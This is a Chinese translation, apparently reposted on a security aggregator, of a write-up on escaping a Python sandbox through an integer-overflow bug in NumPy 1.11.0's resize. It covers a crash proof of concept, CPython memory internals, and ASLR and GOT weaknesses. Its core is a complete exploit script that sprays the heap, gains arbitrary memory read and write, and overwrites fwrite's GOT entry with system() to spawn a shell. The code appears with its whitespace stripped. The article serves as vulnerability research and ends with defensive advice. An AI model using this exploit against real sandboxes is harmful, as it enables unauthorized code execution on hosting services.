Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸

0
0
【技术分享】利用内存破坏漏洞实现 python 沙盒逃逸

2017-04-06 10:53:26
来源:hackernoon.com 作者:beswing

阅读:748次
点赞(0)
收藏





【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸

作者:beswing

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿


索性跳过了文作者的自述,我们直接进入到技术细节吧~

Python环境使用自定义白名单/黑名单方案来阻止访问危险的内置函数,模块,函数等。基于操作系统的隔离提供了一些额外的保护(虽然可能有些过时)。 打破锁定的Python解释器不是一个100%的胜利,但它使攻击者能够威胁到操作系统本身。

作者,是这么认为的,Python模块通常是包装后的C代码,那么我们是否能发现内存被恶意篡改或者利用内存破坏的漏洞来实现Python沙盒的逃逸?

那么,我们该从哪入手。 我知道在Python]沙箱中只能import白名单中的Python模块。 也许我应该运行一个分布式的AFL fuzzer网络? 还是一个符号执行引擎? 或者也许我应该用最先进的静态分析工具扫描它们? 当然,我可以做任何这些事情。 或者我可以跟踪一些曾经出现的bug,来查询是否有仍有可利用的存在。


【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸

【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸

【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸

在作者通过手动代码的审查和测试中,发现了一个Pyhon沙盒白名单的模块的一个可以用的内存破坏漏洞。这个bug,存在于Numpy模块。这是一个一个用python实现的科学计算包。包括:1、一个强大的N维数组对象Array;2、比较成熟的(广播)函数库;3、用于整合C/C++和Fortran代码的工具包;4、实用的线性代数、傅里叶变换和随机数生成函数。numpy和稀疏矩阵运算包scipy配合使用更加方便。

NumPy(Numeric Python)提供了许多高级的数值编程工具,如:矩阵数据类型、矢量处理,以及精密的运算库。专为进行严格的数字处理而产生。多为很多大型金融公司使用,以及核心的科学计算组织如:Lawrence Livermore,NASA用其处理一些本来使用C++,Fortran或Matlab等所做的任务。

如果要从Numpy作为入手,那么我先来分析源码,首先作者查看了代码的行数:

$cloc*520textfiles.516uniquefiles.43filesignored.http://cloc.sourceforge.netv1.60T=2.42s(196.7files/s,193345.0lines/s)————————————————————Languagefilesblankcommentcode————————————————————C683614670025170992Python311277185796187081C/C++Header82177828877847Cython194725561627Fortran90105212136Fortran7732183make1151962————————————————————SUM:47666658133461267828

近20万行的C代码。而且这里存在一些bug。在这篇文章的其余部分,我首先描述导致这个漏洞的条件。 接下来,我讨论一些使用开发人员应该意识到的CPython运行时的行为,然后我将逐步了解实际的漏洞。 最后,我将思考量化在Python应用程序中的内存损坏问题的风险。


The Vulnerability

我将要通过的漏洞是Numpy v1.11.0(也许是旧版本)的整数溢出错误。 自v1.12.0以来,该问题已经解决,但没有发布安全咨询。该漏洞驻留在用于调整Numpy的多维数组类对象( ndarray和friends)的API中。 调用resize调用定义数组形状的元组,其中元组的每个元素都是维的大小。

$python >>>importnumpyasnp >>>arr=np.ndarray((2,2),‘int32’) >>>arr.resize((2,3)) >>>arrarray([[-895628408,32603,-895628408],[32603,0,0]],dtype=int32)

Sidenote:嗯,数组正在泄漏未初始化的内存,但是我们不会专注于这个post。

在覆盖下,resize实际上的realloc缓冲区,其大小计算为形状元组和元素大小中每个元素的乘积。 所以在前面的代码片段中,arr.resize((2, 3))归结为C代码realloc(buffer, 2 * 3 * sizeof(int32))。 下一个代码片段是C中resize实现。

NPY_NO_EXPORTPyObject* PyArray_Resize(PyArrayObject*self,PyArray_Dims*newshape,intrefcheck, NPY_ORDERorder) { //npy_intpis`longlong` npy_intp*new_dimensions=newshape->ptr; npy_intpnewsize=1; intnew_nd=newshape->len; intk; //NPY_MAX_INTPisMAX_LONGLONG(0x7fffffffffffffff) npy_intplargest=NPY_MAX_INTP/PyArray_DESCR(self)->elsize; for(k=0;k<new_nd;k++){ newsize*=new_dimensions[k]; if(newsize<=0||newsize>largest){ returnPyErr_NoMemory(); } } if(newsize==0){ sd=PyArray_DESCR(self)->elsize; } else{ sd=newsize*PyArray_DESCR(self)->elsize; } /*Reallocatespaceifneeded*/ new_data=realloc(PyArray_DATA(self),sd); if(new_data==NULL){ PyErr_SetString(PyExc_MemoryError, "cannotallocatememoryforarray”); returnNULL; } ((PyArrayObject_fields*)self)->data=new_data;

我们可以在代码段中找到漏洞。 您可以在for循环(第13行)中看到每个维度相乘以产生新的大小。 稍后(第25行),将新大小和元素大小的乘积作为大小传递给保存数组的realloc内存。 在realloc之前有一些关于新大小的验证,但是它不会检查整数溢出,这意味着非常大的维度可能导致分配的大小不足的数组。最终,这给攻击者一个强大的攻击途径:通过从具有overflown大小的数组进行索引来读取或写入任意内存的能力。

我们写一个Poc来验证漏洞:

$catpoc.py importnumpyasnp arr=np.array('A'*0x100) arr.resize(0x1000,0x100000000000001) print"bytesallocatedforentirearray:"+hex(arr.nbytes) print"max#ofelemenetsforinnerarray:"+hex(arr[0].size) print"sizeofeachelementininnerarray:"+hex(arr[0].itemsize) arr[0][10000000000] $pythonpoc.py bytesallocatedforentirearray:0x100000 max#ofelemenetsforinnerarray:0x100000000000001 sizeofeachelementininnerarray:0x100 [1]2517segmentationfault(coredumped)pythonpoc.py $gdb`whichpython`core ... ProgramterminatedwithsignalSIGSEGV,Segmentationfault. (gdb)bt #00x00007f20a5b044f0inPyArray_Scalar(data=0x8174ae95f010,descr=0x7f20a2fb5870, base=<numpy.ndarrayatremote0x7f20a7870a80>)atnumpy/core/src/multiarray/scalarapi.c:651 #10x00007f20a5add45cinarray_subscript(self=0x7f20a7870a80,op=<optimizedout>) atnumpy/core/src/multiarray/mapping.c:1619 #20x00000000004ca345inPyEval_EvalFrameEx()at../Python/ceval.c:1539… (gdb)x/i$pc =>0x7f20a5b044f0<PyArray_Scalar+480>:cmpb$0x0,(%rcx) (gdb)x/g$rcx 0x8174ae95f10f:Cannotaccessmemoryataddress0x8174ae95f10f CPython运行时的quirks

在编写漏洞的利用脚本之前。想讨论一些CPython运行时可以轻松利用漏洞的方法,同时也讨论了如何使漏洞利用开发人员受挫。 如果您想直接进入漏洞利用,请随意跳过本节。


泄漏内存地址

通常情况下,首要苦难之一就是绕过地址空间布局随机化(ASLR)。 幸运的是,对于攻击者来说,Python使得这很容易。 内置的id函数返回对象的内存地址,或者更准确地说,封装对象的PyObject结构的地址。

$gdb-q—arg/usr/bin/python2.7(gdb)run-i … >>>a=‘A’*0x100 >>>b=‘B’*0x100000 >>>importnumpyasnp >>>c=np.ndarray((10,10)) >>>hex(id(a)) ‘0x7ffff7f65848’ >>>hex(id(b)) ‘0xa52cd0’ >>>hex(id(c)) ‘0x7ffff7e777b0’

实际上在应用程序中,开发人员应确保不向用户公开id(object) 。 在沙盒化的环境中,除了可以将列表id或重新实现id以返回哈希之外,还可以做很多事情。


了解内存分配行为

了解您的分配器对于编写漏洞利用脚本至关重要。 Python具有基于对象类型和大小的不同分配策略。 我们来看看我们的大字符串0xa52cd0,小字符串0x7ffff7f65848和numpy数组0x7ffff7e777b0。

$cat/proc/`pgreppython`/maps 00400000–006ea000r-xp0000000008:012712/usr/bin/python2.7 008e9000–008eb000r—p002e900008:012712/usr/bin/python2.7 008eb000–00962000rw-p002eb00008:012712/usr/bin/python2.7 00962000–00fa8000rw-p0000000000:000[heap]#bigstring ... 7ffff7e1d000–7ffff7edd000rw-p0000000000:000#numpyarray ... 7ffff7f0e000–7ffff7fd3000rw-p0000000000:000#smallstring

字符串在常规堆中。 小字符串和numpy数组位于单独的mmap区域中。


Python对象结构

泄漏和破坏Python对象元数据可能相当强大,因此了解Python对象的表示方式很有用。 在封面下,Python对象都派生自PyObject ,这是一个包含引用计数和对象实际类型描述符的结构。 值得注意的是,类型描述符包含许多字段,包括可能对读取或覆盖有用的函数指针。

我们先检查我们在前一节中创建的小字符串。

(gdb)print*(PyObject*)0x7ffff7f65848 $2={ob_refcnt=1,ob_type=0x9070a0<PyString_Type>} (gdb)print*(PyStringObject*)0x7ffff7f65848 $3={ob_refcnt=1,ob_type=0x9070a0<PyString_Type>,ob_size=256,ob_shash=-1,ob_sstate=0,ob_sval=“A”} (gdb)x/s((PyStringObject*)0x7ffff7f65848)->ob_sval 0x7ffff7f6586c:‘A’<repeats200times>... (gdb)ptypePyString_Type type=struct_typeobject{ Py_ssize_tob_refcnt; struct_typeobject*ob_type; Py_ssize_tob_size; constchar*tp_name; Py_ssize_ttp_basicsize; Py_ssize_ttp_itemsize; destructortp_dealloc; printfunctp_print; getattrfunctp_getattr; setattrfunctp_setattr; cmpfunctp_compare; reprfunctp_repr; PyNumberMethods*tp_as_number; PySequenceMethods*tp_as_sequence; PyMappingMethods*tp_as_mapping; hashfunctp_hash; ternaryfunctp_call; reprfunctp_str; getattrofunctp_getattro; setattrofunctp_setattro; PyBufferProcs*tp_as_buffer; longtp_flags; constchar*tp_doc; traverseproctp_traverse; inquirytp_clear; richcmpfunctp_richcompare; Py_ssize_ttp_weaklistoffset; getiterfunctp_iter; iternextfunctp_iternext; structPyMethodDef*tp_methods; structPyMemberDef*tp_members; structPyGetSetDef*tp_getset; struct_typeobject*tp_base; PyObject*tp_dict; descrgetfunctp_descr_get; descrsetfunctp_descr_set; Py_ssize_ttp_dictoffset; initproctp_init; allocfunctp_alloc; newfunctp_new; freefunctp_free; inquirytp_is_gc; PyObject*tp_bases; PyObject*tp_mro; PyObject*tp_cache; PyObject*tp_subclasses; PyObject*tp_weaklist; destructortp_del; unsignedinttp_version_tag; }

许多有用的字段读取或写入类型的指针,函数指针,数据指针,大小等等。


Shellcode like it's 1999

ctypes库作为Python和C代码之间的桥梁。 它提供C兼容的数据类型,并允许在DLL或共享库中调用函数。 许多具有C绑定或需要调用共享库的模块需要导入ctypes。

我注意到,导入ctypes会导致以读/写/执行权限设置的4K大小的内存区域映射。 如果还不明显,这意味着攻击者甚至不需要编写一个ROP链。 利用一个错误就像把指令指针指向你的shellcode一样简单,你被授予你已经找到了RWX区域。

$catfoo.py importctypes whileTrue: pass $pythonfoo.py ^Z [2]+30567suspendedpythonfoo.py $greprwx/proc/30567/maps7fcb806d5000–7fcb806d6000rwxp0000000000:000

进一步调查,我发现libffi的封闭API 负责打印RWX区域。 但是,该区域不能在某些平台上分配RWX,例如启用了selinux强制或PAX mprotect的系统,并且有代码可以解决这个限制。我没有花太多时间尝试可靠地定位RWX映射,但是从理论上说,如果你有一个任意读取的exploit,应该是可能的。 当ASLR应用于库(library)时,动态链接器以可预测的顺序映射库(library)的区域。 库(library)的地区包括库私有的全局变量和代码本身。Libffi将对RWX地区的引用存储为全局。 例如,如果您在堆上找到指向libffi函数的指针,则可以将RWX区域指针的地址预先计算为与libffi函数指针的地址的偏移量。 每个库版本都需要调整偏移量。


De facto exploit mitigations

我在Ubuntu 14.04.5和16.04.1上测试了Python2.7二进制程序的安全相关编译器标志。 有几个弱点,对攻击者来说是非常有用的:

Partial RELRO:可执行文件的GOT部分 ,包含动态链接到二进制文件中的库函数的指针,是可写的。 例如,explolo可以用system()替换printf()的地址。

No PIE:二进制文件不是与位置无关的可执行文件,这意味着当内核将ASLR应用于大多数内存映射时,二进制本身的内容将映射到静态地址。 由于GOT部分是二进制文件的一部分,因此PIE不会使攻击者更容易找到并写入GOT。


Road blocks

虽然CPython是充分利用开发人员工具的环境,但有一些力量破坏了我的许多漏洞尝试,难以调试

垃圾收集器,类型系统以及可能的其他未知的力将破坏您的漏洞利用,如果您不小心克隆对象元数据。

id()可能不可靠。 由于我无法确定,Python有时会在使用始对象时传递对象的副本。

对象分配的区域有些不可预测。 由于我无法确定,某些编码模式导致缓冲区被分配到brk堆中,而其他模式导致在一个python特定的mmap'd堆中分配。


漏洞利用

发现numpy整数溢出后不久,我向Bug的一个报告提交了劫持指令指针的概念证明,但没有注入任何代码。 当我最初提交时,我没有意识到PoC实际上是不可靠的,并且我无法对其服务器进行正确的测试,因为验证劫持指令指针需要访问核心转储或调试器。 供应商承认这个问题的合法性,但是比起我的第一份报告,他们给了一个不那么慷慨的回报。

很公平!

我不是一个漏洞利用开发者,但我挑战自己做得更好。 经过多次尝试和错误,我最终写了一个似乎是可靠的漏洞。 不幸的是,我无法在供应商的沙箱中测试它,因为在完成之前更新了numpy,但是在Python解释器中本地测试时它的工作正常。

在高层次上,漏洞利用一个numpy数组的大小来获取任意的读/写漏洞利用的攻击。这个攻击用于将system的地址写入fwrite的GOT / PLT条目。 最后,Python的内置print调用fwrite覆盖,所以现在你可以调用print '/bin/sh'来获取shell,或者用任何命令替换/ bin / sh。

有一些比高级别的解释更多,所以请查看下面的漏洞。 我建议从自下而上开始阅读,包括评论。 如果您使用的是不同版本的Python,请在运行该文件之前调整fwrite和system的GOT位置。

importnumpyasnp #addr_to_strisaquickanddirtyreplacementforstruct.pack(),needed #forsandboxenvironmentsthatblockthestructmodule. defaddr_to_str(addr): addr_str="%016x"%(addr) ret=str() foriinrange(16,0,-2): ret=ret+addr_str[i-2:i].decode('hex') returnret #read_addressandwrite_addressuseoverflownnumpyarraystosearchfor #bytearrayobjectswe'vesprayedontheheap,representedasaPyByteArray #structure: # #structPyByteArray{ #Py_ssize_tob_refcnt; #struct_typeobject*ob_type; #Py_ssize_tob_size; #intob_exports; #Py_ssize_tob_alloc; #char*ob_bytes; #}; # #Oncelocated,thepointertoactualdata`ob_bytes`isoverwrittenwiththe #addressthatwewanttoreadorwrite.Wethencyclethroughthelistofbyte #arraysuntilwefindtheonethathasbeencorrupted.Thisbytearrayisused #toreadorwritethedesiredlocation.Finally,wecleanupbysetting #`ob_bytes`backtoitsoriginalvalue. deffind_address(addr,data=None): i=0 j=-1 k=0 ifdata: size=0x102 else: size=0x103 fork,arrinenumerate(arrays): i=0 foriinrange(0x2000):#0x2000isavaluethathappenstowork #HerewesearchforthesignatureofaPyByteArraystructure j=arr[0][i].find(addr_to_str(0x1))#ob_refcnt if(j<0or arr[0][i][j+0x10:j+0x18]!=addr_to_str(size)or#ob_size arr[0][i][j+0x20:j+0x28]!=addr_to_str(size+1)):#ob_alloc continue idx_bytes=j+0x28#ob_bytes #Saveanunclobberedcopyofthebytearraymetadata saved_metadata=arrays[k][0][i] #Overwritetheob_bytespointerwiththeprovdedaddress addr_string=addr_to_str(addr) new_metadata=(saved_metadata[0:idx_bytes]+ addr_string+ saved_metadata[idx_bytes+8:]) arrays[k][0][i]=new_metadata ret=None forbytearray_inbytearrays: try: #Wedifferentiatethesignaturebysizeforeach #find_addressinvocationbecausewedon'twantto #accidentallyclobberthewrongbytearraystructure. #Weknowwe'vehitthestructurewe'relookingforif #thesizematchesanditcontentsdonotequal'XXXXXXXX' iflen(bytearray_)==sizeandbytearray_[0:8]!='XXXXXXXX': ifdata: bytearray_[0:8]=data#writememory else: ret=bytearray_[0:8]#readmemory #restoretheoriginalPyByteArray->ob_bytes arrays[k][0][i]=saved_metadata returnret except: pass raiseException("Failedtofindaddress%x"%addr) defread_address(addr): returnfind_address(addr) defwrite_address(addr,data): find_address(addr,data) #TheaddressofGOT/PLTentriesforsystem()andfwrite()arehardcoded.These #addressesarestaticforagivenPythonbinarywhencompiledwithout-fPIE. #Youcanobtainthemyourselfwiththefollowingcommand: #`readelf-a/path/to/python/|grep-E'(system|fwrite)' SYSTEM=0x8eb278 FWRITE=0x8eb810 #Spraytheheapwithsomebytearraysandoverflownnumpyarrays. arrays=[] bytearrays=[] foriinrange(100): arrays.append(np.array('A'*0x100)) arrays[-1].resize(0x1000,0x100000000000001) bytearrays.append(bytearray('X'*0x102)) bytearrays.append(bytearray('X'*0x103)) #Readtheaddressofsystem()andwriteittofwrite()'sPLTentry. data=read_address(SYSTEM) write_address(FWRITE,data) #print()willnowcallsystem()withwhateverstringyoupass print"PS1='[HACKED]$'/bin/sh"

运行漏洞利用给你一个“hacked”的shell。

如果您没有运行Python 2.7.12,请参阅漏洞利用中的注释,了解如何使其适用于您的Python版本


量化风险

众所周知,Python的核心和许多第三方模块都是C代码的包装。 也许不那么认识到,内存损坏错误在流行的Python模块中一直没有像CVE,安全公告,甚至提及发行说明中的安全修复一样被报告。

那么是的,Python模块中有很多内存损坏的bug。 当然不是所有的都是可以利用的,但你必须从某个地方开始。 为了解释内存损坏错误造成的风险,我发现使用两个不同的用例来构建对话:常规Python应用程序和沙盒不受信任的代码。


Regular applications

我们关心的应用程序类型是具有有意义的攻击面的那些。 考虑Web应用程序和其他面向网络的服务,处理不受信任内容,特权系统服务等的客户端应用程序。这些应用程序中的许多应用程序导入针对C代码的Python模块,而不是将其内存损坏错误视为安全问题的项目。 这个纯粹的想法可能会让一些安全专业人员在即使受到伤害,也实际上风险通常被忽视或忽视。 我怀疑有几个原因:

远程识别和利用内存损坏问题的难度相当高,特别是对于源代码和远程应用程序。

应用程序暴露不可信输入路径以达到易受攻击的功能的可能性可能相当低。

意识不足,因为Python模块中的内存损坏错误通常不会被视为安全问题。

如此公平地说,由于某些随机Python模块中的缓冲区溢出而导致入侵的可能性可能相当低。 但是,再一次,内存破坏的缺陷在发生时可能是非常有害的。 有时,甚至没有人明确地利用他们造成伤害。 更糟糕的是,当库维护者在安全性方面不考虑内存损坏问题时,保持库修补是非常不可能的。

如果您开发了一个主要的Python应用程序,建议您至少选择正在使用的Python模块的清单。 尝试找出您的模块依赖多少C代码,并分析本地代码暴露于应用程序边缘的潜力。


沙盒

有一些服务允许用户在沙箱内运行不受信任的Python代码。 操作系统级的沙盒功能,如linux命名空间和seccomp,最近才以Docker,LXC等形式流行。今天仍然可以使用较弱的沙盒技术 - 在chroot形式的OS层监狱或更糟糕的是,沙盒可以完全在Python中完成(请参阅pypy-sandbox和pysandbox )。

内存损坏错误完全打破了OS不执行的沙盒。 执行Python代码子集的能力使得开发远比常规应用程序更可行。 即使是由于其虚拟化系统调用的二进程模型而声称安全的Pypy-sandbox也可能被缓冲区溢出所破坏。

如果您想运行任何类型的不受信任的代码,请投入努力建立一个安全的操作系统和网络架构来沙箱。


【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸
【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸
本文由 安全客 翻译,转载请注明“转自安全客”,并附上链接。
原文链接:https://hackernoon.com/python-sandbox-escape-via-a-memory-corruption-bug-19dde4d5fea5?gi=90438c9b4429

Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles





Latest Images